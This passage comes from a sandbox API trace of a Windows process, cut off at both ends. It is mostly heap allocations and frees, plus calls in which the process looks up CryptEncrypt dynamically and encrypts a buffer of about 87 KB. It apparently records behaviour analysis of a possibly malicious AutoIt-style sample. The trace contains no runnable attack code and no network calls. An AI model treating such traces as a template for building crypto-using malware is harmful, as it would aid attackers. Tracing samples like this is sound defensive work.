(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0246.907] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0246.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0246.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0246.907] CryptEncrypt (in: hKey=0xa87290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x1565c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x15660) returned 1 [0246.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0246.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0246.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0246.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0246.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0246.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0246.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0246.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0246.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0246.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0246.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0246.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0246.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0246.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0246.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0246.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0246.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0246.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0246.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0246.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0246.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0246.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0246.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0246.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0246.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0246.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0246.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0246.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0246.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0246.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0246.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0246.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0246.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0246.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0246.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0246.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0246.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0246.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0246.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0246.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0246.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0246.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0246.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0246.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0246.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0246.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0246.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0246.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0246.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0246.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0246.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0246.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0246.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0246.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0246.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0246.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0246.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0246.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0246.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0246.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0246.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.909] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0246.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0246.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0246.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0246.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0246.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0246.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0246.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0246.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0246.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0246.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0246.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0246.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0246.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0246.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0246.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0246.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0246.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0246.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0246.910] CharLowerBuffW (in: lpsz="byte[87648]", cchLength=0xb | out: lpsz="byte[87648]") returned 0xb [0246.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0246.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0246.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0246.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0246.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0246.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0246.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0246.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0246.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0246.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0246.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0246.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0246.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0246.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0246.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0246.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0246.917] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0246.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0246.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0246.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0246.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56060 [0246.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0246.918] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0246.918] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0246.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0246.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0246.921] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0246.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0246.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0246.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0246.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0246.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0246.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51490 [0246.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51490, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0246.922] CryptEncrypt (in: hKey=0xa87290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e94988*, pdwDataLen=0x8cef60*=0x1565c, dwBufLen=0x15660 | out: pbData=0x2e94988*, pdwDataLen=0x8cef60*=0x15660) returned 1 [0246.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0246.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0246.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0246.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0246.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0246.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0246.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0246.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0246.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0246.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0246.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0246.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0246.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0246.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0246.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0246.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0246.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0246.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0246.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0246.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0246.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0246.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0246.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0246.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0246.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0246.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0246.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0246.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0246.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0246.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0246.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0246.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0246.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0246.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0246.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0246.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0246.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0246.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0246.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0246.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0246.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0246.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0246.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0246.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0246.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0246.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0246.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0246.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0246.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0246.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0246.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0246.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0246.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0246.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0246.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0246.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0246.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0246.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0246.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0246.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0246.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0246.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0246.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0246.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0246.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0246.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0246.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0246.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0246.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0246.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0246.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0246.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0246.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0246.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0246.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0246.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0246.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0246.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0246.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0246.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0246.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0246.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0246.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0246.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0246.929] HeapFree (in: 